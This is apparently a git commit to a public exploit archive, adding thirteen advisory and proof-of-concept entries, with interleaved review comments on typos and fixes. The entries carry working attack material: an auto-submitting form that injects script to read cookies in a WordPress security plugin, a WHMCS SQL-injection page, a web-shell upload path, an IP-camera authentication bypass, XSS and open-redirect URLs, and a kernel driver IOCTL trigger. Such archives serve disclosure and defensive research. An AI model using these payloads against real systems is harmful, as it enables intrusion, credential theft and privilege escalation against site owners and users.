DB: 2015-08-26
13 new exploits
This commit is contained in:
parent
4497b423f7
commit
7c8aad6618
14 changed files with 375 additions and 0 deletions
13
files.csv
13
files.csv
|
@ -34271,3 +34271,16 @@ id,file,description,date,author,platform,type,port
|
|||
37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
|
||||
37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
|
||||
37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
|
||||
37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload Vulnerability",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter XSS",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery fullscreen.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
|
||||
37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth 'btkrnl.sys' Driver Local Privilege Escalation Vulnerability",2012-10-18,"Nikita Tarakanov",windows,local,0
|
||||
37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0
|
||||
37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0
|
||||
37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0
|
||||
37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 'index.php' Script Cross Site Scripting Vulnerability",2012-10-19,Netsparker,php,webapps,0
|
||||
37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability",2012-10-21,"Aung Khant",hardware,remote,0
|
||||
37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting Vulnerability",2012-10-18,MustLive,php,webapps,0
|
||||
37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 'googlecheckout.php' SQL Injection Vulnerability",2012-10-22,"Starware Security Team",php,webapps,0
|
||||
|
|
|
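--- a/platforms/hardware/remote/37969.txt
+++ b/platforms/hardware/remote/37969.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56156/info
+
+FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable.
+
+http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker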
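Review bot: The request line ends in `refreshURL==http://attacker`, a doubled `=` that makes the parameter value begin with `=`; it is not clear whether that is a typo or deliberate, and the entry should say which. The useful detail for defenders is already here: the fixed hotfix levels 7.0.0 HF-70-7 and 6.1.0 HF-610-9. Applying them, and having the application accept only relative paths in `refreshURL` rather than absolute URLs, closes the open redirect.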
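--- a/platforms/hardware/webapps/37965.txt
+++ b/platforms/hardware/webapps/37965.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Keeper IP Camera - Authentication Bypass
+# Date: 25/08/2015
+# Exploit Author: RAT - ThiefKing
+# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
+# Version: 3.2.2.10
+# WEB Version: 6.1.17.192
+# Tested on: QB200W, QB130W, QA130W,...
+
+Exploit:
+1 - First, open your browser
+2 - Enter the IP address or domain to see the login screen of the camera
+3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)
+
+You can change or view passwords
+
+TEST: http://server:88/login.asp
+--
+RAT - ThiefKing
+http://tromcap.com
+
+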
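Review bot: The entry gives no vendor fix status and no mitigation, and the `# Version:` header lists only the firmware that was tested, so a reader cannot tell whether any later firmware closes the issue. The `TEST:` line points at login.asp on port 88 while the steps above it reference umanage.asp, which reads as a leftover from a different check; a one-line note on what that URL is meant to show would remove the ambiguity. Until a vendor fix is named, restricting network access to the camera's web interface is the practical control.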
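--- a/platforms/php/webapps/37959.txt
+++ b/platforms/php/webapps/37959.txt
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/56109/info
+
+BSW Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Code in uploadpic.php
+
+print "<form method=\"POST\" action=\"dopic.php\"enctype=\"multipart/form-data\" style=\"width: 227px\">";
+print "<table align=\"center\" style=\"width: 600px\"dir=\"ltr\"><tr><th align=\"right\"width=\"120\" class=\"topic\"><b>File Upload:</b></th>";
+print "<th align=\"left\"><input type=\"file\" name=\"fileupload\"></th></tr>";
+print "<tr><th><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"10240000\"></th></tr></table>";
+print"<table align=\"center\"width=\"600\"dir=\"ltr\">";
+print"<th class=\"topic\"width=\"120\"align=\"right\">Image Title</th><th align=\"left\"><input style=\"width:400\"type=\"text\" name=\"picture\" /></th></table>";
+print"<table align=\"center\"dir=\"ltr\" width=\"600\"><th class=\"topic\" width=\"120\"align=\"right\">Image Description</th>";
+print"<th align=\"left\"><textarea name=\"descrip\"cols=\"48\"rows=\"5\"></textarea></th></table>";
+
+Code in dopic.php
+
+$fname=$_POST['picture'];
+$descrip=$_POST['descrip'];
+$file_dir ="gallery/";
+
+
+foreach($_FILES as $file_name => $file_array) {
+echo "path: ".$file_array["tmp_name"]."<br/>\n";
+echo "name: ".$file_array["name"]."<br/>\n";
+echo "type: ".$file_array["type"]."<br/>\n";
+
+echo "size: ".$file_array["size"]."<br/>\n";
+
+if (is_uploaded_file($file_array["tmp_name"])) {
+move_uploaded_file($file_array["tmp_name"], "$file_dir/".$file_array["name"]) or die ("Couldn't copy");
+echo "Done!<br/>";
+}
+
+}
+$image=$file_dir.$file_array["name"];
+$ip = getenv("REMOTE_ADDR");
+$sql = "insert into gallery (picture,files,descrip,updated)values('$fname','$image','$descrip',now());";
+mysql_query($sql,$mysql);
+mysql_close($mysql);
+
+------------------------------------------------------------------------------------
+Proof of Concept :
+http://www.example.com/path_gallery/uploadpic.php
+Shell :
+
+http://www.example.com/path_gallery/gallery/shell.php
+
+See for the demo :
+
+http://www.example.com/demo/demo1.png
+http://www.example.com/demo/demo2.png
+http://www.example.com/demo/demo3.png
+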
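Review bot: The quoted dopic.php shows a second flaw the description does not mention: `$fname=$_POST['picture']` and `$descrip=$_POST['descrip']` are interpolated unescaped into the INSERT on the `$sql` line, so the record is also SQL-injectable, not only an arbitrary upload. The upload itself keeps the client-supplied `$file_array["name"]` and writes it into the web-served `gallery/` directory with no extension check, which is what turns a file upload into code execution; the remediation is an extension allow-list, a server-generated filename, storage outside the document root, and a prepared statement for the INSERT. Minor: `$file_dir` already ends in `/`, so `"$file_dir/".$file_array["name"]` produces `gallery//name`, and `$ip` is assigned but never used.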
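--- a/platforms/php/webapps/37960.txt
+++ b/platforms/php/webapps/37960.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56110/info
+
+Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
+
+Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
+
+http://www.example.com/path_gallery/force-download.php?file=[RFD]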
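Review bot: Files 37960, 37961, 37962 and 37963 carry the same seven-line description from BID 56110 and differ only in their final request line, so four entries document one advisory; each file's text could say which of the listed issues (file disclosure, SQL injection, XSS) that particular line covers, as the shared paragraph describes all of them. The `[RFD]` placeholder on the last line is not explained anywhere in the file. On the application side the mitigation for this entry is canonicalising the `file` value in force-download.php and checking it against an allow-list of downloadable paths; the sibling entries need a parameterised query and output encoding for `albumid`.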
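--- a/platforms/php/webapps/37961.txt
+++ b/platforms/php/webapps/37961.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56110/info
+
+Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
+
+Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
+
+http://www.example.com/path_gallery/plist.php?albumid=[SQLi]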
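--- a/platforms/php/webapps/37962.txt
+++ b/platforms/php/webapps/37962.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56110/info
+
+Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
+
+Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
+
+http://www.example.com/path_gallery/plist.php?albumid=[XSS]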
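--- a/platforms/php/webapps/37963.txt
+++ b/platforms/php/webapps/37963.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56110/info
+
+Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
+
+Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
+
+http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi]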
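--- a/platforms/php/webapps/37968.txt
+++ b/platforms/php/webapps/37968.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56148/info
+
+CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent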
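--- a/platforms/php/webapps/37970.html
+++ b/platforms/php/webapps/37970.html
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/56159/info
+
+The Wordfence Security plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Wordfence Security 3.3.5 is vulnerable; other versions may also be affected.
+
+<html>
+<head>
+<title>Wordfence Security XSS exploit (C) 2012 MustLive.
+http://websecurity.com.ua</title>
+</head>
+<body onLoad="document.hack.submit()">
+<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
+<input type="hidden" name="email"
+value="<script>alert(document.cookie)</script>">
+</form>
+</body>
+</html>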
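Review bot: The `<title>` content is split across two lines, with `http://websecurity.com.ua</title>` on its own line inside the still-open tag; it is valid HTML but reads as a broken line, and joining the two would be clearer. The form posts to the placeholder host `http://site/`, so the file is a template rather than a runnable page, which the prose above the markup could state. The advisory says the plugin reflects the `email` value of the `_wfsf=unlockEmail` request without sanitising it; the fix on the plugin side is validating the value as an address and HTML-encoding it on output, and the 3.3.5 bound tells defenders which installs to check.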
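--- a/platforms/php/webapps/37971.html
+++ b/platforms/php/webapps/37971.html
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/56173/info
+
+WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WHMCS 4.5.2 is vulnerable; other versions may also be affected.
+
+#Proof of Concept :
+
+<html>
+<head>
+<title>WHMCS Blind SQL Injection POC</title>
+</head>
+<body>
+<script>
+var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
+var http = new XMLHttpRequest();
+try {
+netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
+} catch (e) {
+alert("Permission UniversalBrowserRead denied.");
+}
+http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
+http.onreadystatechange = handleResponse;
+http.send(params);
+function handleResponse() {
+
+if(http.readyState == 4 && http.status == 200){
+var response = http.responseText;
+alert(response);
+}
+}
+</script>
+</body>
+</html>
+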
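Review bot: `netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead")` is a Firefox-only API that was removed from the browser in 2012, so the `try` block always falls into the `catch` branch in any current browser and the cross-origin `http.responseText` read in `handleResponse` is blocked by the same-origin policy; the file should state that, as written, the page only demonstrates that a request is sent, not that a response can be read. The title says "Blind SQL Injection" while the code's only observable is `alert(response)`, which is the non-blind case; one of the two should change. For the application the point is the `google-order-number` element, which the advisory says reaches an SQL query unsanitised, and the fix in googlecheckout.php is a parameterised query rather than string concatenation.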
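--- a/platforms/windows/dos/37966.txt
+++ b/platforms/windows/dos/37966.txt
@@ -0,0 +1,68 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
+
+The following access violation was observed in Microsoft Office 2007
+(Word document):
+
+(8c0.e68): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
+eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+mso!Ordinal7799+0x2fc:
+32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
+0:000> k
+ChildEBP RetAddr
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012d038 328a0a4e mso!Ordinal7799+0x2fc
+0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
+0012dde4 320c337c mso!Ordinal4388+0x19a
+0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
+0012de74 312db32b wwlib!DllGetClassObject+0x8504d
+0012df1c 312dadf8 wwlib!FMain+0x96d7c
+0012df84 312da84c wwlib!FMain+0x96849
+0012e074 6be51b27 wwlib!FMain+0x9629d
+0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
+0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
+0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
+0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
+0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
+0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
+0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
+0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
+0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
+0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
+0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
+0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209
+
+Notes:
+
+- Reproduce on Windows Server 2003 and Windows 7.
+
+- The crash occurs due to an invalid read dereference of a bad object
+pointer. If the word value read is controlled and set to a value other
+than 0xFFFF, then a controlled value is used as an indirect call
+target (at 328A1DD4 in MSO.dll 12.0.6683.5000).
+
+- The bad object pointer is passed in to MSO.dll from wwlib.dll
+(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).
+
+- The test-case reduces to a 50-bit difference from the original
+sample document.
+
+- The affected bits lie in the OneTableDocumentStream's data section,
+as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.
+
+- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
+source buffer from the OneTableDocumentStream's data section, and
+copies this invalid data into a stack buffer. The bad object pointer
+comes from this stack-based structure.
+
+- Attached files: 037542f7_crash.rtf (crashing file),
+037542f7_orig.doc (original file). A test case with full control of
+the crashing register value (0xAAAAAAAA) is also attached
+(037542f7_full.doc)
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip
+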
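--- a/platforms/windows/dos/37967.txt
+++ b/platforms/windows/dos/37967.txt
@@ -0,0 +1,65 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
+
+The following access violation was observed in Microsoft Office 2007
+(Word document):
+
+(e24.e28): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
+eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
+MSVCR80!memcpy+0x5a:
+7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
+0:000> k
+ChildEBP RetAddr
+001221e8 31249c0e MSVCR80!memcpy+0x5a
+00122204 3126a371 wwlib!FMain+0x565f
+00122220 3203de3c wwlib!FMain+0x25dc2
+00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
+00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
+0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
+001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
+00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
+001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
+00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
+00123b68 3129e8e5 wwlib!FMain+0x5af3c
+00123bac 32073906 wwlib!FMain+0x5a336
+00126d28 32073627 wwlib!DllGetClassObject+0x35644
+0012b14c 32073294 wwlib!DllGetClassObject+0x35365
+0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
+0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
+0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
+0012f580 320e04b7 wwlib!FMain+0xd00d5
+0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
+0012f648 32812493 wwlib!DllGetClassObject+0xa20bd
+
+Notes:
+
+- Reproduces on Windows Server 2003 and Windows 7
+
+- The crash occurs due to a memcpy with an invalid source buffer.
+
+- The invalid source buffer is actually indicative of an invalid size
+being used in a pointer calculation at 3126A360 (wwlib.dll
+12.0.6707.5000). This invalid size can also be seen in ecx at the time
+of access violation.
+
+- The large size parameter can result in a stack-based buffer overflow.
+
+- Alternatively, if the copy operation succeeds (by using a size value
+large enough to result in an out-of-bounds source buffer, but not so
+large to cause an access violation during copy), then it is also
+possible to get an arbitrary free from later usage of controlled
+pointers in the destination buffer.
+
+- The crashing test case was created using a chunk reordering
+strategy, and does not cleanly minimize (106 bit change from original
+file).
+
+- Attached files: 86ea4a3c_crash.rtf (crashing file),
+86ea4a3c_orig.doc (original file)
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip
+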
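--- a/platforms/windows/local/37964.c
+++ b/platforms/windows/local/37964.c
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/56124/info
+
+Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
+
+Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
+
+HANDLE hDevice;
+char *inbuff, *outbuff;
+DWORD ioctl, len,;
+
+if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
+0,
+0,
+0,
+OPEN_EXISTING,
+0,
+NULL) ) != INVALID_HANDLE_VALUE )
+{
+printf("Device succesfully opened!\n");
+}
+else
+{
+printf("Error: Error opening device \n");
+return 0;
+}
+inbuff = (char*)malloc(0x12000);
+if(!inbuff){
+printf("malloc failed!\n");
+return 0;
+}
+outbuff = (char*)malloc(0x12000);
+if(!outbuff){
+printf("malloc failed!\n");
+return 0;
+}
+ioctl = 0x2A04C0;
+memset(inbuff, 0x41, 0x70);
+DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
+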
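Review bot: `DWORD ioctl, len,;` has a stray comma before the semicolon, and the code is a bare statement sequence with no enclosing function or includes, so the file does not compile as posted even though it is stored as `.c`; the entry should either wrap it in a function or say above the code that it is a fragment. The result of `DeviceIoControl(...)` is never checked, `hDevice` is never passed to `CloseHandle`, and both `malloc` buffers are leaked, which a reader re-running the check to confirm a crash will notice; the string `"Device succesfully opened!\n"` also misspells "successfully". From the defender's side the useful artefacts are the device name `\\.\btkrnl` and control code `0x2A04C0` with a 0x70-byte input; the fix belongs in the driver's handler for that code, which should validate the input buffer's length and contents before use.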